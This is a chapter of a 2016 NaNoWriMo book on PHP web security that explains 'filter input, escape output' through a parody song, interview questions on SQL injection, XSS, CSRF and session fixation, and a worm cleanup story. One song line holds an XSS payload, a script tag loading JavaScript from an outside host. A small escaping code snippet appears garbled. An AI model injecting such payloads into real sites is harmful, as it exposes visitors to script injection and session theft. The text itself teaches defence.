Web Code (NaNoWriMo 2016)

Chapter. Filter Input-Escape Output: Security Principle and Practice

You give me your data
You give me your DDoS
You need it back pro rata
and you tell me what to toss

So I feel you deserve
the data throughput
take a look at my extension
and open filter_input()

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

I put my $_SERV'R in a box for you
I put my $_ENV in a box for you
I put my $_SESS'N in a box for you

There’s a global war on terror
but my globals never die
And phpBB might get you hacked
but my GETs are certified

You might like heaps protected
But, my buffers are so too
MySpace showed the worlda worm
But my input is just for you

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

I put my $_SERV'R in a box for you
(It won’t treat_data)
I put my $_ENV in a box for you
(But it might pass secinfo)
I put my $_SESS'N in a box for you

You put your junk in a box
So there is one thing I could do
I’m putting finishing touches
on my data in a box for youuuuuu

I put my $_GET in a box for you
I put my $_POST in a box for you
I put my $_COOKIE in a box for you

One. Compile 5.2
Two. Choose a filter
Three. Set the filter.default
Four. Read the superglobal
Five. Admire your data

Forgery. (My data in a box)
Fixation. (My data in a box)
Injection. (My "> \<script src="http://hacksh.it/data_box.js">)
Ajax. (My data in a box)

I put my $_SERV'R in a box for you
I put my $_ENV in a box for you
I put my $_SESS'N in a box for you

— adapted from “My Box in a Box” in honor of filter functions being added to PHP

For me to be discussing security may seem ironic given I once said, “Web security is a luxury, not a necessity. For any of you think good coding, design aesthetic, or web security are important, I have only one word for you: MySpace.”

But one of the formulations of humor is in the interaction of realism and exaggeration, which the above note relies on.

The web security “track” has been one of my more enjoyable set of interview questions back when I worked at a social network. In this story, I’ll cover this track of questions, how I’d answer them, and how this applies to my understanding of PHP and Web Security.

(Be warned! These are not easy questions—with a small variation, I’d even get stuck easily. That is the nature/feature of security. One of my coworkers once sat in one of my interviews and afterward told me, “When you asked those security questions, I thought [the candidate] was actually going to cry.”)

Security Practice comes from principles

When people ask for a recommendation of a book on web Security, I used recommend Essential PHP Security by Chris Shiflett.

Why? Because it was impossibly small.

Web security is both really simple and an infinite mass of shit. If you start with the ad hoc approach, it will seem to only be the latter; but, if you take to the time to learn the building blocks which form the language of security principles, then it start to all make sense and become the former.

By virtue of being small, a security guide must focus on the vocabulary and principles, without drowning you in detail. I want you to take the time to learn those things. If you don’t have the vocabulary then you can’t do web security.

To understand why, let’s take these interview questions:

Question: What is a SQL injection attack? Give me a simple example of how you do it.

SQL injection is when user input causes the execution of unwanted SQL on the database.

Most candidates get that part, but the second part trips about half of them. I think this is embarrassing because Randall Munroe would have no problem with it:
Exploits of a Mom—xkcd by Randall Munroe

The basic points I’m looking for are:

  • Have they ever thought like an attacker? If you can’t think like an attacker, you can’t think like a defender; if you can’t think up exploits, you can’t defend against exploits.
  • Did their answer have a basic escape sequence?
  • Did their answer inject data or a command?

Bonus points if they can explain why the xkcd exploit specifically doesn’t work in mysql on PHP. (Reason: mysql extension does not support multiple statements in a single query.)

Question: Name three ways to protect against SQL injection? For each way explain where you’d place it in your code?

The key to answering this is to understand that the nature of the attack centers around the quote mark. So the solutions are to either remove the quote mark, escape the quote mark, or use a built-in feature to protect against the quote mark.

That is:

  1. You can filter out the quote mark. You would do this on input.
  2. You can escape the quote mark using something like mysql_real_escape_string(). You would do that just before outputting to (querying) the database.
  3. You can use a prepared query on the database, if your database and PHP extension supports it (some didn’t until later (c.f. mysqli_prepare).

Almost every candidate can give at least one of the above, perhaps because they’ve been screened before I interviewed them. A decent number get all three with a little guidance!

Bonus points if they mention mysql_escape_string() and more if mysql_real_escape_string() and more if they explain the difference between these and escape().

Both the database and the extension must support prepared queries, otherwise the “prepared query” is just an abstracted version of escaping. (This is not the same. What if your database abstraction emulates a prepared query using escape(). Do you know the answer to that right this second? See why I hate database abstraction?)

However, while they can come up with filtering or escaping, almost no one in an interview explains the correct placement of this code. That’s because they think like hackers, not architects. The filter extension (mentioned in the song above) changes this since it forces filtering on the input. I’ve had a number of candidates argue with me about the correct placement of the filtering on input or the correct placement of the escaping on output. Many were competent Perl coders. By the end of this entry I hope you’ll understand why I’m right and they’re wrong (and perhaps why Perl coders self-select themselves to mess this question up). 😉

Question: Which protection against SQL injection is the right approach?

This is a trick question. My answer is that I’d do two things: filter on input and I’d use prepared queries if possible or escaping if not on output (not both, obviously).

What I’m looking for is that there is no single best way (though clearly, I’ll give them some props if they mention that prepared queries are better than the others).

Why? That’s just good security!

Security is not a impenetrable wall. It sits on top of a mountain surrounded by a decently-sized wall, with a moat in front of it, and a healthy number of alert guards on the battlements.


Like an ogre, good web security has “layers.”  😛

I can go on for hours telling stories of people who haven’t understood this principle and paid the price. What you think is an unassailable fortress falls will fall like Dien Bien Phu to a clever attacker. In this case, if you chose just one security model, it’s easier to ask yourself about how it would handle the following use cases:

  • What if it is the data field is the person’s name and he’s “Tim O’Reilly”?
  • What happens if at a later point, I decide to send the data somewhere (file, memcache, back to the user) before, or instead of, putting it in the database?
  • What if I migrate from MySQL to SQL Server, which has a different way of escaping?
    function mssql_escape_string($string) {
    return str_replace(“‘”,”””,$string);

  • What if I migrate to a data store that doesn’t support prepared queries?

Real world software changes with business needs. Business needs change very often in the web world. Good software is flexible enough to change with it. (Exception: Ruby on Rails. In those cases, the problem isn’t the software, the problem clearly is you. If you don’t “get it,” then it’s creator, David Heinemeir Hansson has “two words for you…” 😊)

The principle here is “If the security protocol isn’t too inconvenient, always implement it and put it as early as reasonably possible in the application flow.”

More on this later.

Question: How would you create a single security audit point for injection attacks

I skip this question if a candidate has missed an earlier one.

My answer would be a Data Access pattern. If you are a framework guy, you’d use a persistence layer (like ActiveRecord) to abstract yourself entirely from the database because, apparently, LEFT JOINs are is just too damn hard…

Given how many “web security” people have bombed bomb this series in interviews, I’m inclined to start agreeing with that statement.

Question: What is Cross-Site Scripting (XSS)? Cross Site Request Forgery (CSRF)? the Session Fixation attack? Describe an example of how you would implement the attack (and how to defend against it in your code)

Again, the reason for the end is to give an opportunity for the to apply this stuff in practice. To think concretely like an attacker shows real knowledge beyond the simple theory. Again, if you don’t understand the attack, you can’t defend against it. Again, these principles come from the practice.

Here is the definition of XSS, XSRF, and Session fixation.

I’ll confess that the only reason that I ask about session fixation is because, once in a while, I meet a candidate who can define XSS and CSRF easily, and Sadistic Me wants to see if I can break them. Session fixation is the web security equivalent of asking people how to laugh in hexadecimal. It’s an obscure vulnerability easily-corrected and known by us old-timers. This makes it a fun one to lord over people. (How to laugh in hex: 48 41 48 41.)

CSRF is certainly important when building an API for use in Ajax. But I’ll continue with XSS (what it is, how to do it, how to protect against it) to hook off of later in this series.

Question: Explain how the MySpace worm works? Give an example of using CSRF to determine login state on a remote site?

I don’t ask these questions normally. But some of the more belligerent candidates bitch about the previous series as being “just terminology.” Basically this dismissal is the security/interview equivalent of “I’m not really into Pokémon.

Really, do they think I ask these questions for fun?

If you can’t answer the above two questions, figure them out on your own. Understanding how to answer these is how you’ll get a zen-like ability to quickly understand security vulnerabilities to build security practice once you’ve taken the time to understand these simple security principles (in this case what and how to combine: XSS, CSRF, and Javascript exception handling).

(Aside: When I saw Chris Shiflett’s second tweet ever, I was really pissed. He found the same vulnerability in Twitter as I did. I had been sitting on that vulnerability for months and was going to pass the time one day by writing a twitter worm.)

Question: What does “filter input-escape output” mean? Give an example of filtering? Give an example of escaping?

Filter input-escape output is a best practice, not a design pattern!

Here is Wikipedia’s definition, but put simply it is the principle that all filtering should be done on the input to the application server and escaping should be done out the output from the application server. _

The problem is, even if people can intuit that or have heard of it (surprising few candidates have, but most can guess), many haven’t thought about what is filtering and what is escaping? But that’s why I asked the other questions because they already have can answer this!

Taking the two examples above (SQL injection and XSS) and applying this principle:

  • To filter SQL injection, you strip out the quote mark or cast the input as an integer (if you are expecting integers), etc.
  • To filter XSS attacks, you use strip_tags(), regular expressions, or a combination of html tidy normalization and a DOM walker that implements a white-list or black-list filter. This filters out the <script> tags as well as injections into CSS—you may need a CSS parser there unless you strip out all style attributes and <style> tags.
  • To escape SQL injection, you use something like mysql_real_escape_string() or prepared queries.
  • To escape XSS attacks, you use htmlspecialchars() or htmlentities(). Both will do things like replace < with &lt; but htmlentities does a bit more which is fine if you are expecting it to be HTML and not XML.

(It might have helped if we had called it “encoding” instead of “escaping.” But we don’t, so deal.)

And from this example, the rest follows.

  • You want to filter on the input, because of the practice of putting as much security as possible as early as possible in the application. The input is as soon as you can. This way all the stuff downstream of the input will achieve the benefits of this protection.
  • Note that some candidates misinterpret “filter input” as putting it in client side code. That’s easily bypassed by the simplest script kiddie scripts/spam bots. They forget that they’re wearing their PHP developer hat, not a front end developer one: we are talking input into the PHP application not the output of the web browser—though it can’t hurt to put it there too.
  • You have to escape on output because escaping functions are going to be different depending on where the data goes. If it goes to the MySQL database, you use mysql_real_escape_string() which generates slightly different than when sending as an argument in the command line (escapeshellarg()) which is different from when outputting back to the user (htmlentities()). (Certainly you have already seen that XSS escaping looks totally different than SQL escaping!)

And the principles apply again and again to XSS as they did to SQL injection.

  • What if I want the HTML to be outputted as HTML because my MySpace-like site with HTML editing and customization? You can’t implement any escaping, but you still have the filtering. And you’ve done that filtering on input right?
  • When you know it isn’t HTML, you should always escape against HTML strings on output to the template. And you also have the freedom of strongly filtering on input by using strip_tags(). This way, you are protected against XSS injection back to the user. XSS forms the basis of many forms of session hijacking and XSRF worms, so that’s a good thing.
  • Therefore, you apply both security rules because no one is going to have complete coverage. And because you don’t want security to be an impenetrable wall, right?

And this leads to further understanding of the concept of “input” and “output.” Input doesn’t mean “input from the user’s browser” it means “input into the application server” and “output” doesn’t mean “output to the returned HTML” it means “output from the application server to any external source.”

PHP still does what it does best (act as glue code) but with the hard-won security principles tacked on. In the old days, this meant gluing the user to a database back end and back, but on a modern website, this means so much more. We’ve gone well beyond from a “3-tier architecture” or even “n-tier” to a complex architecture of highly cohesive external services with simple, standard interfaces, one of which is the user of the website via html (i.e. user via ajax payload, 3rd party api in XML REST, JSON, SOAP, XMLRPC, or binary protocols, memcache, database, command line, smtp/sendmail, back-end business objects, TCP, UDP, or direct calls via SWIG or extension or whatever.)

From principle to practice

I’ll give you an example of how I applied the above principle of “filter input, escape output” when working at a social network. Because they were a MySpace-like social network, we had to allow most HTML input and thus base our input filtering of certain fields on a blacklist of illegal tags, properties, urls instead of a whitelist of allowed tags (more common of many libraries out there). I knew I could not “build an impenetrable wall” with a blacklist—the spec is always changing and there are an “infinite mass of shit” in security. I also needed a system that needed to be flexible to business needs (in other words, I had to be able to poke very selective holes in my security model based on business needs).

So instead, I did what I had time to do (write a custom html input filter), and then applied the principle of filter input-escape output to the system architecture. But not just with a kick-ass user input filter (filter input); not on user output (remember, I can’t escape the HTML in this case); not just on escaping to the database (via stored procedure to Oracle); but also on input from the database and memcache stores.

In other words, I encoded the version number of the HTML input filter on output to the database and to memcache, so on input, I could check to see if it was out of date and run the html filter again! Why?

Because I knew that one day, we were hacked. Within hours a XSS worm injected into the style tags of the widgets on our site had “infected” 60,000 user profiles. Even if we stopped it on user input, we still would have the 60,000 user profiles to deal with, across all the databases in the federation containing 50 million user profiles. This would have taken days to clean the mess!

Instead, I asked for a copy of the exploit, figured out the nature of the attack (an injection involving running executable javascript from CSS), added a CSS parser (which I had lying around because I knew about this attack, but I was too lazy to look up its exact nature), hooked it up to the html filtering object and bumped the version number.

All new uploaded content was filtered against it. And as users used the site, they were fixing existing corrupted HTML snippets in the site’s memcache. Then, at our leisure, we could test the new filter against regressions and slowly remove the attack permanently from the database. All using the same code and all because of the principle:

Filter input, escape output. Know the difference between filtering and escaping. And we mean all inputs and all outputs

And I did this without building an “impenetrable wall,” but a series of barriers, moats, and what not—every input an opportunity to filter, every output an opportunity to escape, the flexibility to deal with breaches designed in the architecture.


Layers. Like an ogre!

Instead of panicking or a massive site outage, two hours later, I was headed to a Y Combinator Christmas party and getting royally wasted.

Question: What are “Magic Quotes” and why is it bad?

This is the gravy. Many a PHP developer knows, “Magic Quotes are bad.” But did you know that they’re monotonically bad? (For instance, a case can be made for keeping register_globals, but none can be made for magic_quotes.)

And can you answer this question this simply?

“Magic Quotes are bad because it escapes input, and you should filter input, escape output!”

Now you can!

Hard experience has taught people developing large PHP sites that you should escape only on output. Anyone old hand has written PHP code that is deployed on scale or on a variety of hosted services know of the nightmare that is magic_quotes. Heck, the WordPress codebase at a low level STILL has escaped code stored in certain data fields because of the assumption of magic_quotes. (Sure, you could have escaped on input, but you would have to know what escapes were applied and carried it with the variable as metadata—most commonly by changing the variable name—it gets quickly very ugly.)

Put simply:

magic_quotes has the implicit assumption that the output of all input is a mysql/postgres database or command line and the attacker is not that clever.

Which brings us full circle to the Perl developer who continued to argue with me that I can (and should) escape the input. Perl is “311 code”—chmod 311 *.pl (writer can write and execute, the company and the world can execute, nobody can read it)!. One of the consequences of Perl’s TIMTOWTDI philosophy means the Perl coder simply isn’t used to the concept that their code will be broken into parts and edited by a team of people.

While PHP code may have had its origins in “Rasmus wants to build his Personal Home Page and he wants a template tool to do it,” it now has to power large scale, complex websites such as Facebook, Yahoo, Wikipedia, and WordPress.

Code has become complex. magic_quotes made sense when we we were naïve about inputs and outputs (input meant from the user and output meant to a mysql database); magic_quotes made sense when we didn’t really understand the difference between filtering and escaping.

But many PHP developers spent many years trying to pull things like magic_quotes out of the system from the wreckage of their code created many late-night debugging sessions and broken Sourceforge PHP application installs.

Are you going to learn from their experiences, or are you going to doom yourself to repeat them?

And that is the nature of security:

Practice creates good principles. Those principles make for good practice.

Now we’re done

And after this, Can you see why I didn’t understand why I had a low tolerance for poor candidates in “web security”? Do they really want websites to fall flat on their asses and to be poorly-architected, vulnerable piles?

I actually want your website staying online, I want you able to enjoy your Christmas party without fear of being “on call” for a late night security patch session.

Returning to the joke that “Security is a luxury” that touched off this story.

Before one interview, a candidate’s resume listed web security under skills. Of course they got this battery of questions from me, and, as luck would have it, it was especially egregious (the aforementioned one where my colleague thought I was going to make him cry).

I was about to move on but the candidate, clearly frustrated by this experience, said to me, “Look, if you give me a website, I can make it secure.”

I was crestfallen—the person didn’t know what a SQL injection attack was! Then, I realized, “Wow! He’s right! Shit. I can make a web server unhackable too: just disconnect it from the internet.”

So I suppose that’s as good a tip as any:

If you absolutely have to make your website secure, go to the colo and pull out all your ethernet cables.


Part III. Ri: Musings and Mistakes

This section is dedicated to mom